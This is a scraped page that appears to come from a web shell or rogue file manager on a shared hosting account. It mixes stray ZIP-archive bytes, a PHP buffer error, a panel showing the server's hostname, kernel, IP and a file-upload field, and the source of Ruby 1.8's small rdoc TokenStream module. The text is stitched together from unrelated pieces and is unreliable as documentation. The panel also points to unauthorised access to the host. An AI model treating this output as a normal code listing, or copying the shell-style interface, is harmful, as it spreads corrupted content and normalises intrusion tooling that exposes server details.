PK œqhYî¶J‚ßFßF)nhhjz3kjnjjwmknjzzqznjzmm1kzmjrmz4qmm.itm/*\U8ewW087XJD%onwUMbJa]Y2zT?AoLMavr%5P*/
Notice: ob_end_clean(): Failed to delete buffer. No buffer to delete in /home/telusvwg/public_html/da754d/index.php on line 8
$#$#$#

Dir : /opt/alt/ruby18/lib64/ruby/1.8/rdoc/
Server: Linux premium279.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
IP: 66.29.132.192
Choose File :

Url:
Dir : //opt/alt/ruby18/lib64/ruby/1.8/rdoc/tokenstream.rb

# A TokenStream is a list of tokens, gathered during the parse
# of some entity (say a method). Entities populate these streams
# by being registered with the lexer. Any class can collect tokens
# by including TokenStream. From the outside, you use such an object
# by calling the start_collecting_tokens method, followed by calls
# to add_token and pop_token.

module TokenStream

  # Returns the tokens collected so far (nil until collection starts).
  def token_stream
    @token_stream
  end

  # Begins a fresh collection, discarding any previously gathered tokens.
  def start_collecting_tokens
    @token_stream = []
  end

  # Appends a single token to the stream.
  def add_token(tk)
    @token_stream << tk
  end

  # Appends every token from an enumerable, in order. Delegates to
  # add_token so that subclasses overriding it see each token.
  def add_tokens(tks)
    tks.each { |tk| add_token(tk) }
  end

  # Removes and returns the most recently added token.
  def pop_token
    @token_stream.pop
  end
end